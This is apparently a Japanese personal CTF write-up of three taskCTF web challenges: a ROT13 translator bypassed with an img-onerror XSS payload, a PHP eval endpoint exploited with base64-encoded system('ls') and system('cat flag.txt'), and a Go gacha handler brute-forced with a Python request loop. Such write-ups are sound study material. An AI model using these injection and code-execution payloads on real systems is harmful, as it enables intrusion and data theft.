kanyewest CTF

勉強したことをメモしています。

taskCTF: Write up

Web

Caesar Cipher Translator

"><script>alert("TEST");</script>と入力すると

f:id:tekashi:20201206121652p:plain

f:id:tekashi:20201206121626p:plain

"><fpevcg>nyreg("vawrpgrq");</fpevcg> (これは "><script>alert("injected");</script> をROT13した文字列)

<script>タグを使わない方法ということで、"><img src=1 onerror='alert("injected")'/> を使う。

f:id:tekashi:20201206161204p:plain

f:id:tekashi:20201206161121p:plain

flag: taskctf{n1ce_inject10n!}

Evil Eval

<?php
// Challenge source for "Evil Eval": the `data` query parameter is base64-decoded,
// evaluated as the right-hand side of an assignment to $result, and $result is
// then printed into the HTML page below.
//
// SECURITY: this is a deliberately vulnerable pattern. Request data reaches
// eval() unchanged, and the value is later echoed without htmlspecialchars(),
// so the page is both a code-execution sink and an HTML-injection sink.
$result = "";
    if (isset($_GET['data'])) {
        // Caller-controlled: read straight from the query string.
        $data = $_GET['data'];
        // base64 is only an encoding; decoding it performs no validation or
        // filtering of what the caller sent.
        $raw = base64_decode($data);
        // SECURITY: the decoded text is concatenated into the code string, so the
        // sender of the request decides which PHP runs in the web server process.
        // Mitigation: never pass request data to eval(); if an expression
        // evaluator is needed, parse a restricted grammar (for example, arithmetic
        // only) with a dedicated parser and reject everything else.
        eval('$result = ' . $raw . ';');
    }
?>
<html>
<head>
    <meta charset="utf-8">
    <title>result</title>
</head>
<body>
    <h1>結果</h1>
    <p><?= $result ?></p>
</body>
</html>
$ echo -n 'system("ls");' | base64
c3lzdGVtKCJscyIpOw==
$ echo -n 'system("cat flag.txt");' | base64
c3lzdGVtKCJjYXQgZmxhZy50eHQiKTs=

f:id:tekashi:20201206120927p:plain

flag: taskctf{eval_1s_b4d_h4bit}

Gacha

// gachaHandler is the HTTP handler quoted from the "Gacha" challenge. Only the
// first part of the function appears in this listing; the code that writes the
// response is not shown.
//
// It reads the "seed" form value, adds the current UTC+9 time encoded as the
// integer HHmmss, and fills in the flag map when the sum modulo 100000 is 1337.
//
// NOTE(review): both terms of that check are known to the caller: the seed comes
// from the request and the other term is the wall-clock time. The outcome is
// therefore steerable by the client rather than random. A server-side draw
// from crypto/rand that ignores client-supplied seeds would remove that control.
func gachaHandler(w http.ResponseWriter, r *http.Request) {
    // Client-controlled input; an absent or empty value falls back to "1".
    seed := r.FormValue("seed")
    if len(seed) == 0 {
        seed = "1"
    }
    seedInt, err := strconv.Atoi(seed)
    if err != nil {
        // NOTE(review): a malformed seed is a client error, but it is reported
        // as 500 and the parser's error text is returned to the caller; a 400
        // with a fixed message would describe it better.
        http.Error(w, err.Error(), http.StatusInternalServerError)
        return
    }

    // Current time of day at a fixed UTC+9 offset, formatted as HHmmss.
    jst := time.FixedZone("Asia/Tokyo", 9*60*60)
    nowStr := time.Now().In(jst).Format("150405")
    log.Println(nowStr)
    // Atoi drops leading zeros, so nowInt ranges from 0 to 235959. The layout
    // yields digits only, so this error path should not trigger in practice.
    nowInt, err := strconv.Atoi(nowStr)
    if err != nil {
        http.Error(w, err.Error(), http.StatusInternalServerError)
        return
    }

    // In Go the result of % takes the sign of the dividend, so a negative seed
    // can make sm negative.
    sm := (seedInt + nowInt) % 100000
    log.Println(sm)
    // flag stays nil unless the branch below assigns it; how the non-winning
    // case is answered is outside this excerpt.
    var flag map[string]string

    if sm == 1337 {
        flag = map[string]string{
            "flag": "taskctf{this_is_dummy_flag}",
        }
    }

与えられたファイルを読むと、(seedInt + nowInt) % 100000 が 1337 になれば flag が出てくることがわかる。また seed 値はユーザが自由に設定できるっぽい。

適当にスクリプト書いて総当りしてたらflag出てきた。

import requests

# Base URL of the challenge instance used in this write-up; the candidate seed
# is appended as the value of the `seed` query parameter.
url = "http://34.82.49.144:3334/?seed="

# Request one seed after another and print each URL and response body.
# The loop does not stop when a flag is returned. Seen from the server, this is
# a single client sending sequential seed values; per-client rate limiting
# would slow it down, but the root cause is that the handler accepts a
# caller-chosen seed at all.
for seed in range(177770, 10_000_000):
    target = f"{url}{seed}"
    print("url: ", target)
    reply = requests.get(target)
    print(reply.text)
{"flag":"You might not have a luck...","sum":"1329"}
url:  http://34.82.49.144:3334/?seed=177785
{"flag":"You might not have a luck...","sum":"1330"}
url:  http://34.82.49.144:3334/?seed=177786
{"flag":"You might not have a luck...","sum":"1332"}
url:  http://34.82.49.144:3334/?seed=177787
{"flag":"You might not have a luck...","sum":"1333"}
url:  http://34.82.49.144:3334/?seed=177788
{"flag":"You might not have a luck...","sum":"1334"}
url:  http://34.82.49.144:3334/?seed=177789
{"flag":"You might not have a luck...","sum":"1335"}
url:  http://34.82.49.144:3334/?seed=177790
{"flag":"taskctf{Y0u_h4ve_4_gre4t_luck}"}

flag: taskctf{Y0u_h4ve_4_gre4t_luck}